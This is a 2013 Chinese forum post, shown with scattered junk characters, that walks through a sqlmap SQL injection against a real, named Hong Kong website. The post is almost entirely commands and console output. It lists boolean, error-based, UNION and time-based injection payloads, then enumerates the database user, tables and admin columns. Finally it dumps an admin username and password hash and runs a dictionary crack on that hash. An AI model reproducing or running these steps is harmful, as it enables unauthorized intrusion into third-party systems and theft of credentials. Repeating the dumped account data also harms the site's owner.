找回密码
 立即注册
查看: 2843|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, {0 \6 J- ^9 f* L2 Q, j: kms "Mysql" --current-user       /*  注解:获取当前用户名称# B1 x2 J* X  R! Y2 T: T* r6 d
    sqlmap/0.9 - automatic SQL injection and database takeover tool
1 n+ L% ]8 A' [    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    6 F2 V( ]( H; M$ S! a. ?[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as; _0 }# r5 l/ K  U
    session file
    # f' |+ [4 p0 [4 E+ D, ?! P[16:53:54] [INFO] resuming injection data from session file; {: @% L2 X6 [
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    $ o: |! i" ]' K8 `# Z1 E# s[16:53:54] [INFO] testing connection to the target url
    % ]7 h$ \! }- ^( K4 ssqlmap identified the following injection points with a total of 0 HTTP(s) reque! q/ p! }( g! p3 S: S. |
    sts:) A3 z! J+ F# Y6 C
    ---2 c7 e8 B+ y2 z3 _  W% I
    Place: GET4 L/ L9 a6 w* |+ G2 [
    Parameter: id
    * Q) w  f' G, U; \6 V    Type: boolean-based blind
    * \) P* F2 t9 M, F2 d3 O6 d    Title: AND boolean-based blind - WHERE or HAVING clause7 {) ?) u! L5 _6 T: w
        Payload: id=276 AND 799=799
    3 O$ c/ c$ Q, t0 x    Type: error-based
    ' M7 e9 D" ]: g1 d/ i    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! X" z7 e" b( j4 s0 j/ ]
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    6 D) a0 U6 v& t' H5 c, H) e( l9 T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 }. b! o) Q  `# I. o: Q0 I
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ( X  K8 T0 v' U+ i# q/ j7 ~    Type: UNION query
    5 K4 I: H6 Z' d; f    Title: MySQL UNION query (NULL) - 1 to 10 columns
    % |% l, ~3 V* \- x5 f, y, T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    0 j+ \+ S- i: C! e6 x  k(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 L; d0 r5 d6 z! _2 Y
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    4 V/ U; o* ^& H/ F" ^    Type: AND/OR time-based blind
    / [; Z/ s4 y: i5 N    Title: MySQL > 5.0.11 AND time-based blind
    0 f8 c; d' p& H3 ^; X9 F    Payload: id=276 AND SLEEP(5)- ^% M/ A: \3 |4 M: p/ [9 T/ `
    ---7 M2 n7 o/ V- K. z
    [16:53:55] [INFO] the back-end DBMS is MySQL& ?2 ^9 c% y* b9 C1 p6 N( A8 M
    web server operating system: Windows
    - r* y+ ^/ ?+ [! m$ ?2 m8 }web application technology: Apache 2.2.11, PHP 5.3.0
    ; @; J1 ~6 }+ f3 P8 m" h$ Aback-end DBMS: MySQL 5.0
    / C8 l# m" C5 L5 d! }/ M2 R- m% ~[16:53:55] [INFO] fetching current user
    ) r' h2 z* o5 f2 p9 Lcurrent user:    'root@localhost'   
    3 J* b0 A% z, T' m% E3 U% v0 p  m[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    % ?# {& D/ H6 t& r8 htput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    " ~4 n- l! V' [; g* Q" O( g; W& T4 z! Z9 k% [
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" g& {/ s8 O' P$ c- w1 \
    ms "Mysql" --current-db                  /*当前数据库
    - f* b3 z$ x7 Q9 e' R9 W    sqlmap/0.9 - automatic SQL injection and database takeover tool2 D9 l( x* S0 P. O5 o. K, m/ C
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    4 I$ ~+ y# M4 F2 c. C) P[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    + u6 J% [  _% N9 s session file
    + j3 z8 W# s' m: H+ Z' G6 ^3 ^[16:54:16] [INFO] resuming injection data from session file
    7 Y) ]) K: j4 s6 A" T5 c+ S5 r[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* V! I1 P# S/ L3 U0 r( c+ V& Q1 ?; l
    [16:54:16] [INFO] testing connection to the target url% H) ?! H" A3 r' K9 @
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 A+ M7 j( A  ^+ }' ]
    sts:
    3 |2 D/ ^2 j" r) k---( e2 E1 c7 ]) N3 j0 Y
    Place: GET# E0 \) S6 y6 A) q. R- Y8 F
    Parameter: id
    2 t3 G4 e$ g& A& y  V    Type: boolean-based blind" N8 f! g, _" T
        Title: AND boolean-based blind - WHERE or HAVING clause
    + ?3 r& H, F8 ]; ?' Z    Payload: id=276 AND 799=799
    " ]* F1 |! G# L( F2 @    Type: error-based
    ( z0 q6 ^" ?: @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / q( r% r8 {9 O2 {, ~, J: Q/ N    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ( B9 o! M" W- P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 |& y8 A7 Y9 c) _0 @
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    # r6 \! o  x' k    Type: UNION query
    3 p: n" h7 t& E( Q    Title: MySQL UNION query (NULL) - 1 to 10 columns, a: ]% p$ r! B
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR  T0 a2 p6 s! w/ s
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 B! j8 H* {% k: JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) S2 |4 Y5 o0 ~4 R
        Type: AND/OR time-based blind8 @/ i. K& P/ R# |* A6 F
        Title: MySQL > 5.0.11 AND time-based blind
    . a8 p0 }1 x$ y4 Z/ ]    Payload: id=276 AND SLEEP(5)
    8 e; g+ ~. `2 P! z1 s# n8 p---
    5 a9 \% W/ A9 ]. O; H- c8 ?5 f[16:54:17] [INFO] the back-end DBMS is MySQL: G' O# A! S6 S+ f. W8 b+ T
    web server operating system: Windows1 X& D' o) Y) M! d1 \0 f
    web application technology: Apache 2.2.11, PHP 5.3.09 B" }0 E0 h/ o9 z1 f" A( Y
    back-end DBMS: MySQL 5.02 Z1 ~! b2 V) g& F6 J" I6 K2 {
    [16:54:17] [INFO] fetching current database
    7 }" @" |; s1 Y& n$ i/ L% g, ccurrent database:    'wepost'0 F6 S. F% L/ k' c9 n6 [2 ?
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, \' Q1 X) D& b4 k7 k, x* U
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:183 T& u8 a3 L8 a( g
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 {3 V6 @1 {/ U6 p2 Z5 {
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    , y% J! Z7 Z4 [4 A    sqlmap/0.9 - automatic SQL injection and database takeover tool  ~6 i6 a5 o/ W1 V& r- S6 @
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    ( g  W5 g  J$ H[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    / m/ b1 N: Y2 P9 g0 @; V8 N session file
      d/ j* o4 |% [4 I[16:55:25] [INFO] resuming injection data from session file" M; O; m0 q4 x& H
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    , W! J/ W- z" G# z( A3 O[16:55:25] [INFO] testing connection to the target url# N  k2 \: [" w  a5 O
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    + P6 G# O, f% s% ~* _4 qsts:" g6 @: `, p: _& ~1 l% v  ~+ W
    ---; a- |0 y9 Y2 A( @7 u3 e! k- f
    Place: GET
    + `, b+ p4 K" ?: ~$ \Parameter: id% H7 ?2 ^& C/ s. ?' I# W( i" ?
        Type: boolean-based blind, a  U/ Q( a5 l% o
        Title: AND boolean-based blind - WHERE or HAVING clause
    ! K; v% E" L, t    Payload: id=276 AND 799=799/ {( \! J7 p! Y. u/ h2 f
        Type: error-based
    " O! v/ O( a7 Y6 x    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* e" G1 g+ X# g% M9 |8 q
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," p: T' r8 `8 z$ L; I
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 L0 i. P# i# O  f5 J),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    8 V2 e. Y) b+ P) E& ]    Type: UNION query/ f- [5 B4 O$ }: w0 z
        Title: MySQL UNION query (NULL) - 1 to 10 columns# W" G, `$ j- i
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ) ?" ^+ t- p* q6 M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),  L0 Z, n7 R8 `( J1 Z
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ( U! w, K2 f$ T! y  U8 n4 C$ `; c. {    Type: AND/OR time-based blind
    9 }1 B6 P+ x& o2 q    Title: MySQL > 5.0.11 AND time-based blind
    , ?2 s3 ^. `  F; N) Y0 j4 ~& q( b4 K    Payload: id=276 AND SLEEP(5)
    0 h4 q" k* {6 p' _; \$ \' @4 o---
    1 k% A4 j% G& N9 S8 w/ _  G[16:55:26] [INFO] the back-end DBMS is MySQL
    5 }6 B. a! }0 F8 p# }web server operating system: Windows
    5 |  C! c  U( _9 Oweb application technology: Apache 2.2.11, PHP 5.3.0% k0 s3 v8 U, D2 G+ _; A3 W9 h& h
    back-end DBMS: MySQL 5.0: w& H) ^& V% x
    [16:55:26] [INFO] fetching tables for database 'wepost'
    1 ^0 [: W. n* _/ ^( ][16:55:27] [INFO] the SQL query used returns 6 entries
    3 R# v0 l* a# ^0 z' t. `' sDatabase: wepost4 B% H; V% V5 s7 h
    [6 tables]
    $ J$ Z$ k1 o, p8 c: F/ t. |+-------------+. b6 c# w% f# F- z$ G1 I: T: r3 G/ l
    | admin       |, j" {0 T+ Y! g+ y0 G
    | article     |8 ~  X& L, L5 v5 b4 t3 n
    | contributor |
    8 t# L* M4 G+ P3 n# I' K% J2 [| idea        |
    , P7 J9 z4 s; H6 p# D. ]$ l- || image       |; U5 @5 Z$ T7 u! z. f0 s$ _4 |
    | issue       |9 q6 _5 g' {: z1 j" ]1 l* S& a
    +-------------+
    / G2 L! C! B  v% S7 G( K+ l[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    * t  ]  y4 m' w. g! u5 G/ S* Z, u5 l1 btput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    $ |0 j  V# \8 w2 h: c
    2 |3 {( p1 {% W0 PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db  k  R9 Y  r" x! T+ J8 o& r! L
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    ) Q* f% O4 Y- p, j, m    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ( g! R  ]% X% Z+ Y( X    http://sqlmap.sourceforge.net
  • starting at: 16:56:061 w. {9 ]6 v/ t0 [5 Z1 S2 n
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 I7 G/ k3 Q/ l) Z! k3 ^& \4 o1 z+ `
    sts:
    ! j' o: f, c# h" J3 |---
      e- z: I" M" j: Q- \" e$ yPlace: GET' q2 w. `0 v& `. s4 v
    Parameter: id
    - u% L0 z1 J2 }4 ^5 ?4 s    Type: boolean-based blind
    3 ^3 f$ D! X0 }! G    Title: AND boolean-based blind - WHERE or HAVING clause& n. B& k) ]4 K2 z7 W. O* r& i0 F2 Y% M
        Payload: id=276 AND 799=799# u5 ~: S0 Z0 ~+ o
        Type: error-based
    * o. h+ S0 n" e# e, _    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 }3 C- |( w+ @9 N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ ~% R8 B8 [5 Z1 `5 _) G+ Z; K) |
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& \3 X7 L) G9 \5 f; {' m
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 I$ c& t9 C+ n4 _* S- [& E: s
        Type: UNION query
    ' M, e, C) l( Y    Title: MySQL UNION query (NULL) - 1 to 10 columns
    , ?) I* {4 Q' e# T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    0 Z& ^: g+ D/ N(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 x- m1 {& E' D& G6 eCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 u% B  S6 R5 M* n* Q
        Type: AND/OR time-based blind
    # N4 Z# W  }. H+ L/ R    Title: MySQL > 5.0.11 AND time-based blind- {1 _0 }/ z+ \  i
        Payload: id=276 AND SLEEP(5)
    7 \7 u. p: V( }9 v5 Q2 c' Z7 f---$ h' _6 h5 e( U7 i9 y2 T2 o
    web server operating system: Windows6 W  o5 x: d$ Y9 t+ Y, B
    web application technology: Apache 2.2.11, PHP 5.3.0
    - ~/ b$ b$ T' Zback-end DBMS: MySQL 5.0
    : F4 d+ ~& @$ |7 v0 t* o[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se$ P5 C8 v. _6 B1 f% |
    ssion': wepost, wepost6 E* ^  v5 {& J, ~4 b
    Database: wepost% s" X5 c1 J% F% L$ Y7 u. h+ ~$ {
    Table: admin9 A1 l, l2 ?; E# P& c: G$ h
    [4 columns]
    ! y7 R6 T( N" ]& b+----------+-------------+
    $ e9 s0 i# b" I6 R+ U' X- h! ^2 ?| Column   | Type        |
    5 v, q0 M% m! A# f4 O. E+----------+-------------+
    5 i$ u8 O( e! o1 O5 o| id       | int(11)     |
    " w7 e6 R6 ~+ g; d: M| password | varchar(32) |9 x4 Z5 F0 m" p' V
    | type     | varchar(10) |
    1 O! b' y+ f0 I8 t1 ?6 F| userid   | varchar(20) |$ a: t8 ?. G; O3 k/ T
    +----------+-------------+% I/ b/ r. X! p8 P" C
  • shutting down at: 16:56:199 X' [$ ?0 j$ _
    ) ~8 I; z% O4 K
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* Q) Y# }$ }* D
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容# u9 n% b+ `6 u; ]1 i
        sqlmap/0.9 - automatic SQL injection and database takeover tool& q, K$ L$ k! C; b; g- j0 d
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    , z/ q+ n6 \- v: p3 n2 k# j% Nsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . t  c  @, ~  z  M& Tsts:
    9 _. X$ Y+ o+ i- z0 u+ P4 ^: x---8 x. n, n8 v( V$ }9 M, U4 k
    Place: GET
    ) |; s7 a6 F) p; S3 I2 N1 e- OParameter: id6 I/ |. k3 U$ ~
        Type: boolean-based blind
    7 c4 Y6 \2 p* m. x) S    Title: AND boolean-based blind - WHERE or HAVING clause; M0 D2 e: G8 G3 r
        Payload: id=276 AND 799=799* Y* P3 V2 ~8 K: ^
        Type: error-based, K+ M- g# {' A2 Z
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    . V; U  g6 l% b# K1 }    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# w+ g4 Z# Z  `' C
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; J! q8 \5 r2 }9 M5 F
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). Z0 g7 g( M4 u( u. x
        Type: UNION query
    " X& K" ~' Y; w5 k" @    Title: MySQL UNION query (NULL) - 1 to 10 columns; j) o4 s0 a$ j) v# |* E
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    8 U4 }) c6 x1 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / S/ [* @; o) h8 G8 e2 QCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 F" p8 g! r) O2 V# @
        Type: AND/OR time-based blind
    + U+ {( k% X6 v. w5 F; J0 o  G    Title: MySQL > 5.0.11 AND time-based blind' ?3 l6 d4 P+ m, ?! A
        Payload: id=276 AND SLEEP(5)
    6 i' _8 z4 L( ^1 F% A0 {---/ r3 L; y* N# q" v
    web server operating system: Windows0 u* z8 P( |) Q" y! l
    web application technology: Apache 2.2.11, PHP 5.3.0
    - {* @! X0 H- u- l- `# Y3 F& i2 Vback-end DBMS: MySQL 5.0
    : R2 N( ?9 P1 K- N4 D( |recognized possible password hash values. do you want to use dictionary attack o
    + K9 U' M' L9 `" }  {n retrieved table items? [Y/n/q] y
    ) v  U% ^  h7 v1 y0 Owhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]- a5 O# g0 I( [2 g& ?
    do you want to use common password suffixes? (slow!) [y/N] y8 i1 D& c2 o5 Q# y, E% I& B6 B
    Database: wepost3 G1 `0 V7 c' \( w& J) J
    Table: admin
    0 q$ e. i- ?8 H[1 entry]
    6 n  C  `" y* X1 F; p9 }+----------------------------------+------------++ }& k; R( p$ Q, D  p2 \4 Z
    | password                         | userid     |1 k' c+ T1 a% G
    +----------------------------------+------------+5 T6 A8 Z- i% ?& B
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    : i6 d& R( O" O/ n4 x5 {3 S+----------------------------------+------------+
    ( l: i& |; s  [; H, y, A2 |* N" h
  • shutting down at: 16:58:14! g9 t: ^/ `, z5 q

    & L9 n* J; z- ED:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表